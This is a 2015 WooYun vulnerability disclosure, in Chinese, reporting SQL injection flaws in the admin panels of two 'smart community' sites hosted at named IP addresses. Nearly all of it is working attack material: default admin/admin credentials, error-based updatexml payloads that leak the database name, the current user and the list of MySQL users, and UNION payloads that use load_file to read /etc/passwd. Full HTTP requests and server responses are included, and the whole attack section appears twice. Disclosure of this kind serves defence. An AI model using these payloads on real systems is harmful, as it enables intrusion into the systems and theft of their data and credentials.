当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118847

漏洞标题:智慧社区多个站点多个sql注入打包

相关厂商:深圳协创互联科技有限公司

漏洞作者: xxlegend

提交时间:2015-06-10 08:19

修复时间:2015-07-27 19:46

公开时间:2015-07-27 19:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-10: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

智慧社区多个站点多个sql注入打包

详细说明:

$str = array(
array(
"province" => "内蒙古自治区",
"city" => "鄂尔多斯",
"community" => "兴胜街道",
"server" => "http://182.92.11.190/"
),
array(
"province" => "山东省",
"city" => "济南",
"community" => "堤口路街道",
"server" => "http://182.92.233.188/"
)
);
后天弱口令都是admin/admin
1,注入1

POST http://182.92.233.188/index.php/Admin/addPeople?id=batch'+and+1=updatexml(1,concat(0x5e24,database(),0x5e24),1))+--+ HTTP/1.1


返回值:

1105:XPATH syntax error: '^$kona_api^$'
 [ SQL语句 ] : SELECT * FROM `kona_people` WHERE (  id = 'batch' and 1=updatexml(1,concat(0x5e24,database(),0x5e24),1)) -- ' ) LIMIT 1


2,修改新闻处注射2,支持union

POST http://182.92.233.188/index.php/Admin/postNews?id=batch')+union+all+select+1,2,3,(select+load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100))),(select+substring(load_file('/etc/issue'),1,20)),6,7,8--++ HTTP/1.1


返回值:

zhihui-zhuru1.png


3,

POST http://182.92.233.188/index.php/Admin/postNotice?id=batch')+union+all+select+1,2,3,(select+load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100))),(select+substring(load_file('/etc/issue'),1,20)),6,7,8--++ HTTP/1.1


返回值:

zhihui-zhuru2.png


旗下站点:
http://182.92.233.188/
http://182.92.11.190/
登录弱口令:admin/admin
1,

GET http://182.92.233.188/index.php/Admin/delCommunity?communityId=100' and+ 1=updatexml(1,concat(0x5e24,user(),0x5e24),1))--+ HTTP/1.1


返回信息:

<h1>1105:XPATH syntax error: '^$root@localhost^$'
 [ SQL语句 ] : DELETE FROM `kona_community` WHERE ( id='100'and 1=updatexml(1,concat(0x5e24,user(),0x5e24),1))-- ' )</h1>


http://182.92.233.188/index.php/Admin/delCommunity?communityId=100'+and+1=updatexml(1,concat(0x5e24,(select+group_concat(user)+from+mysql.user),0x5e24),1))--+  HTTP/1.1


返回值:

1105:XPATH syntax error: '^$gyf,root,root,,root,,gyf,root^'
 [ SQL语句 ] : DELETE FROM `kona_community` WHERE ( id='100' and 1=updatexml(1,concat(0x5e24,(select group_concat(user) from mysql.user),0x5e24),1))-- ' )


2,request请求:
Delpeopel接口处sql注入:
POST http://182.92.233.188/index.php/Admin/delPeople?act=batch HTTP/1.1
Host: 182.92.233.188
Proxy-Connection: keep-alive
Content-Length: 66
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://182.92.233.188
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://182.92.233.188/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: PHPSESSID=kn7vnh0qhvi61kn7tnmvl0v1q1
ids=1000,11111,10000=updatexml(1,concat(0x5e24,database(),0x5e24),1)
返回值:

1105:XPATH syntax error: '^$kona_api^$'
 [ SQL语句 ] : DELETE FROM `kona_people` WHERE ( id in (1000,11111,10000=updatexml(1,concat(0x5e24,database(),0x5e24),1)
) AND id != '1' )


3,

POST http://182.92.233.188/index.php/Admin/addPeople?id=batch'+and+1=updatexml(1,concat(0x5e24,database(),0x5e24),1))+--+ HTTP/1.1
Host: 182.92.233.188
Proxy-Connection: keep-alive
Content-Length: 13
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://182.92.233.188
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://182.92.233.188/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: PHPSESSID=kn7vnh0qhvi61kn7tnmvl0v1q1
realname=ss


返回值:

1105:XPATH syntax error: '^$kona_api^$'
 [ SQL语句 ] : UPDATE `kona_people` SET `realname`='ss\r\n',`community_id`=11,`online_lock`='',`login_time`=0 WHERE (  id = 'batch' and 1=updatexml(1,concat(0x5e24,database(),0x5e24),1)) -- '  )


漏洞证明:

$str = array(
array(
"province" => "内蒙古自治区",
"city" => "鄂尔多斯",
"community" => "兴胜街道",
"server" => "http://182.92.11.190/"
),
array(
"province" => "山东省",
"city" => "济南",
"community" => "堤口路街道",
"server" => "http://182.92.233.188/"
)
);
后天弱口令都是admin/admin
1,注入1

POST http://182.92.233.188/index.php/Admin/addPeople?id=batch'+and+1=updatexml(1,concat(0x5e24,database(),0x5e24),1))+--+ HTTP/1.1


返回值:

1105:XPATH syntax error: '^$kona_api^$'
 [ SQL语句 ] : SELECT * FROM `kona_people` WHERE (  id = 'batch' and 1=updatexml(1,concat(0x5e24,database(),0x5e24),1)) -- ' ) LIMIT 1


2,修改新闻处注射2,支持union

POST http://182.92.233.188/index.php/Admin/postNews?id=batch')+union+all+select+1,2,3,(select+load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100))),(select+substring(load_file('/etc/issue'),1,20)),6,7,8--++ HTTP/1.1


返回值:

zhihui-zhuru1.png


3,

POST http://182.92.233.188/index.php/Admin/postNotice?id=batch')+union+all+select+1,2,3,(select+load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100))),(select+substring(load_file('/etc/issue'),1,20)),6,7,8--++ HTTP/1.1


返回值:

zhihui-zhuru2.png


旗下站点:
http://182.92.233.188/
http://182.92.11.190/
登录弱口令:admin/admin
1,

GET http://182.92.233.188/index.php/Admin/delCommunity?communityId=100' and+ 1=updatexml(1,concat(0x5e24,user(),0x5e24),1))--+ HTTP/1.1


返回信息:

<h1>1105:XPATH syntax error: '^$root@localhost^$'
 [ SQL语句 ] : DELETE FROM `kona_community` WHERE ( id='100'and 1=updatexml(1,concat(0x5e24,user(),0x5e24),1))-- ' )</h1>


http://182.92.233.188/index.php/Admin/delCommunity?communityId=100'+and+1=updatexml(1,concat(0x5e24,(select+group_concat(user)+from+mysql.user),0x5e24),1))--+  HTTP/1.1


返回值:

1105:XPATH syntax error: '^$gyf,root,root,,root,,gyf,root^'
 [ SQL语句 ] : DELETE FROM `kona_community` WHERE ( id='100' and 1=updatexml(1,concat(0x5e24,(select group_concat(user) from mysql.user),0x5e24),1))-- ' )


2,request请求:
Delpeopel接口处sql注入:
POST http://182.92.233.188/index.php/Admin/delPeople?act=batch HTTP/1.1
Host: 182.92.233.188
Proxy-Connection: keep-alive
Content-Length: 66
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://182.92.233.188
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://182.92.233.188/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: PHPSESSID=kn7vnh0qhvi61kn7tnmvl0v1q1
ids=1000,11111,10000=updatexml(1,concat(0x5e24,database(),0x5e24),1)
返回值:

1105:XPATH syntax error: '^$kona_api^$'
 [ SQL语句 ] : DELETE FROM `kona_people` WHERE ( id in (1000,11111,10000=updatexml(1,concat(0x5e24,database(),0x5e24),1)
) AND id != '1' )


3,

POST http://182.92.233.188/index.php/Admin/addPeople?id=batch'+and+1=updatexml(1,concat(0x5e24,database(),0x5e24),1))+--+ HTTP/1.1
Host: 182.92.233.188
Proxy-Connection: keep-alive
Content-Length: 13
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://182.92.233.188
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://182.92.233.188/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: PHPSESSID=kn7vnh0qhvi61kn7tnmvl0v1q1
realname=ss


返回值:

1105:XPATH syntax error: '^$kona_api^$'
 [ SQL语句 ] : UPDATE `kona_people` SET `realname`='ss\r\n',`community_id`=11,`online_lock`='',`login_time`=0 WHERE (  id = 'batch' and 1=updatexml(1,concat(0x5e24,database(),0x5e24),1)) -- '  )


修复方案:

加入sql过滤函数

版权声明:转载请注明来源 xxlegend@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-12 19:45

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评论